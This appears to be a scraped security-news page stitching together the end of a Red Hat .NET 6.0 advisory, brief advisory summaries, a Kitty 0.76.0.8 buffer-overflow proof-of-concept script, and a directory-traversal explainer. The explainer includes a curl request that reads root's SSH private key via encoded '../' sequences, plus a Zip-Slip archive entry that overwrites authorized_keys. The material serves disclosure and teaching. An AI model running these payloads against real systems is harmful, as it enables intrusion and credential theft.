dotnet-apphost-pack-6.0-6.0.6-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.6-1.el8_6.x86_64.rpm  
dotnet-host-6.0.6-1.el8_6.x86_64.rpm  
dotnet-host-debuginfo-6.0.6-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.6-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.6-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-6.0.6-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.6-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-6.0.106-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.106-1.el8_6.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.6-1.el8_6.x86_64.rpm  
dotnet-templates-6.0-6.0.106-1.el8_6.x86_64.rpm  
dotnet6.0-debuginfo-6.0.106-1.el8_6.x86_64.rpm  
dotnet6.0-debugsource-6.0.106-1.el8_6.x86_64.rpm  
netstandard-targeting-pack-2.1-6.0.106-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.6-1.el8_6.aarch64.rpm  
dotnet-host-debuginfo-6.0.6-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.6-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.6-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.106-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.106-1.el8_6.aarch64.rpm  
dotnet6.0-debuginfo-6.0.106-1.el8_6.aarch64.rpm  
dotnet6.0-debugsource-6.0.106-1.el8_6.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.6-1.el8_6.s390x.rpm  
dotnet-host-debuginfo-6.0.6-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.6-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.6-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.106-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.106-1.el8_6.s390x.rpm  
dotnet6.0-debuginfo-6.0.106-1.el8_6.s390x.rpm  
dotnet6.0-debugsource-6.0.106-1.el8_6.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.6-1.el8_6.x86_64.rpm  
dotnet-host-debuginfo-6.0.6-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.6-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.6-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.106-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.106-1.el8_6.x86_64.rpm  
dotnet6.0-debuginfo-6.0.106-1.el8_6.x86_64.rpm  
dotnet6.0-debugsource-6.0.106-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-30184  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqnJg9zjgjWX9erEAQgdkw/9Gs5Zi+edz5GreOtb8AdSu9LtZxCydrT0  
61p5IAD21gJIvdMbHiJqNXEwX1tIeSSHdZ4dk2aweXxYxPzzT08RsXXTuKkheH5O  
ci2bDO56TQ4MKUOYXS/1pIzh6+DwrqYaLr6rzXgkBzFARO4tKrPqxNLmgonR36gL  
MhZwWBrIKt7KLigkmA5yeG75ycceHE4ljbBmn9jKLuRiUCtRRfJ6vgM0DqYjklMP  
cl2+CRcU2SpevW0gFCzTx0DXBNeQPU6Nkhvjf0RCyQRDR67jCn0qO4dJY/N/tf+M  
BoIQGtfKlFpPnlm0v0EAYzOHc0rdxBd26V/VlAz+2cssUbxIhEbmuaGKmZ3qXmYX  
3ZpBK7oooL+KtPOyaCv4HdM4MKkDZ3WCLLrbubym7l2APx0qh3Ev+pdmFoJYtABU  
8s+wm8DKJN0ZzZqW8vJ8vPtnwMo1f3FaelCFAFKFI0OR9lxEJ/tahBxr+KSI4pW2  
faGey+RFa4O2cL5PnO3ID8zTHRlhqVjudEZ8fupVHYRnaEuSPTFcz4fXRIkpfUmd  
NmWfn3yM8EDJ/5DzNs1tqeAvzeWaKMCt4fjzxh8rcyE+JkJCDJ+tl+IJyQ3GEL4I  
n605bXmk9DCuF6hA9jUG9/kBLc6JHt2Py7W7sc3qT60lkVenEdH5a6zM6hFxxrvU  
ohIv9gC1SKI=  
=6pI+  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5046-01

Red Hat Security Advisory 2022-5002-01 - The Advanced Virtualization module provides the user-space component for running virtual machines that use KVM in environments managed by Red Hat products. Issues addressed include buffer overflow, integer overflow, and memory leak vulnerabilities.

Red Hat Security Advisory 2022-5002-01

Kitty version 0.76.0.8 suffers from a buffer overflow vulnerability.

    # Exploit Title: Kitty 0.76.0.8 Stack Buffer Overflow# Discovered by: Yehia Elghaly# Discovered Date: 2022-06-08# Vendor Homepage: http://www.9bis.net/kitty/index.html#!index.md# Software Link : https://www.fosshub.com/KiTTY.html?dwl=kitty_portable-0.76.0.8.exe# Tested Version: 0.76.0.8# Vulnerability Type: Buffer Overflow# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64# Description: Kitty 0.76.0.8 Stack Buffer Overflow# Steps to reproduce:# 1. - Run the python script and it will create exploit.txt file.# 3. - Kitty 0.76.0.8# 4. - Sessions -> Save# 5. - Paste the characters of txt to Saved/Sessions then click save# 6. - Crashed# Note: ECX Overwwrite #!/usr/bin/pythonexploit = 'A' * 2091try:     file = open("exploit.txt","w")    file.write(exploit)    file.close()    print("POC is created")except:    print("POC not created")

Kitty 0.76.0.8 Stack Buffer Overflow

Zyxel firewalls, AP controllers, and APs suffer from buffer overflow, format string, and command injection vulnerabilities.

Zyxel Buffer Overflow / Format String / Command Injection

The package github.com/argoproj/argo-events/sensors/artifacts before 1.7.1 are vulnerable to Directory Traversal in the (g *GitArtifactReader).Read() API in git.go. This could allow arbitrary file reads if the GitArtifactReader is provided a pathname containing a symbolic link or an implicit directory name such as ...


A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

*   **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

    curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
    

**Note** %2e is the URL encoded version of . (dot).

*   **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

    2018-04-15 22:04:29 .....           19           19  good.txt
    2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Tag

#ssh